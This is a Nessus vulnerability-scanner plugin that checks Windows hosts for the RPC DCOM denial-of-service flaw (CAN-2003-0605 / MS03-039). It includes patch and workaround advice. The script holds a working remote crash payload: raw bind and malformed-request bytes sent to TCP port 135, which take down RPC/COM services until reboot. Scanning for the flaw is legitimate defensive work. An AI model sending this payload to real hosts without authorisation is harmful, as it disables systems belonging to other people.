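#
# (C) Tenable Network Security
#
# Original exploit from xfocus.org
# Workaround by Michael Scheidell from SECNAP Network Security
#
# Destructive check for the RPC DCOM interface denial of service
# (CAN-2003-0605 / MS03-039).  The plugin connects to TCP/135, sends
# `bindstr` followed by `request`, waits one second and then reports
# the flaw if the port no longer accepts a connection.  It is
# registered as ACT_KILL_HOST because a vulnerable target loses its
# RPC/COM services until it is rebooted.
#
# Fix: `port` was never assigned before the final security_hole(port)
# call, so the finding was reported against an undefined port.  The
# port number is now held in one variable and used throughout.

if(description)
{
  script_id(11798);
  script_version ("$Revision$");
  script_bugtraq_id(8234);
  script_cve_id("CAN-2003-0605");
  if(defined_func("script_xref"))script_xref(name:"IAVA", value:"2003-A-0012");

  name["english"] = "RPC DCOM Interface DoS";
  script_name(english:name["english"], francais:name["francais"]);

  desc["english"] = " It is possible to disable the remote RPC DCOM Interface by sending a malformed request to it. The system will need to be rebooted to recover. An attacker may exploit this flaw to remotely disable RPC related programs on this host. Solution : http://www.microsoft.com/technet/security/bulletin/ms03-039.asp Workaround : For a temporary workaround, either filter ALL TCP traffic to this host, including TCP port 135 and ALL ports used for RPC services or disable the Microsoft Distributed Transaction Coordinator NOTE: Turning Distributed Transaction Coordinator in Service panel will NOT fix the problem, the 'dcom' config program must be used instead : >> Start >> Run >> 'dcomcnfg.exe' >> Default Properties Tab Clear the 'Enable Distributed Com on this computer' >>OK Risk Factor : Serious";
  script_description(english:desc["english"]);

  summary["english"] = "Remotely close port 135";
  script_summary(english:summary["english"]);

  # Crashes everything com-related: the scanner treats this category as
  # a host-killing test, so it must only be enabled on targets where an
  # outage is acceptable.
  script_category(ACT_KILL_HOST);

  script_copyright(english:"This script is Copyright (C) 2003 Tenable Network Security");
  family["english"] = "Denial of Service";
  script_family(english:family["english"]);
  script_require_ports(135);
  exit(0);
}

# The RPC endpoint port this check targets; also the port the finding is
# reported against.
port = 135;

if(!get_port_state(port))exit(0);

# Bind PDU, followed by the malformed request that triggers the crash.
bindstr = raw_string(0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,
                     0x7F,0x00,0x00,0x00,0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,
                     0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0xA0,0x01,0x00,0x00,
                     0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
                     0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,
                     0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00);

request = raw_string(0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,
                     0x13,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x01,0x00,0x03,0x00,
                     0x05,0x00,0x06,0x01,0x00,0x00,0x00,0x00,0x31,0x31,0x31,0x31,
                     0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
                     0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
                     0x31,0x31,0x31,0x31,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00);

soc = open_sock_tcp(port);
if(!soc)exit(0);

# The replies are read to drain the socket but are not inspected; the
# verdict below rests solely on whether the port comes back.
send(socket:soc, data:bindstr);
r = recv(socket:soc, length:60);
send(socket:soc, data:request);
r = recv(socket:soc, length:60);
close(soc);

# NOTE(review): a failed reconnect after 1 s is taken as proof of the
# DoS.  A slow, overloaded or newly filtered host can therefore be
# reported as vulnerable, and a host whose service is restarted within
# the sleep is missed; confirm findings against the MS03-039 patch level.
sleep(1);
soc = open_sock_tcp(port);
if(!soc)security_hole(port);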